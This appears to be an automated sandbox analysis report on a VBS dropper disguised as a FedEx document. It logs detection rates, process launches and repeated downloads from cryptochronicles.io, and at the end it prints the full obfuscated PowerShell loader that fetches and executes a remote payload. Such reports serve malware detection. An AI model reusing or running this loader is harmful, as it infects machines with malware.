Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: cryptochronicles.io |
Virustotal: Detection: 9% |
Perma Link |
Source: http://cryptochronicles.io |
Virustotal: Detection: 9% |
Perma Link |
Source: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxd |
Virustotal: Detection: 9% |
Perma Link |
Source: CR-FEDEX_TN-775537409198_Doc.vbs |
Virustotal: Detection: 28% |
Perma Link |
Source: CR-FEDEX_TN-775537409198_Doc.vbs |
ReversingLabs: Detection: 18% |
Source: |
Binary string: ore.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbJS source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbGE source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb[ source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE60000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdbR source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllh source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ore.pdbk source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.pdb source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping google.com -n 1 |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: google.com |
Source: powershell.exe, 00000008.00000002.2491936262.0000021001A51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxdP |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000477000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://cryptochronicles.io0 |
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/- |
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236757544.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1217504358.0000028413041000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c074 |
Source: wscript.exe, 00000000.00000003.1217146005.00000284111AE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c |
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6388 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6388 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi |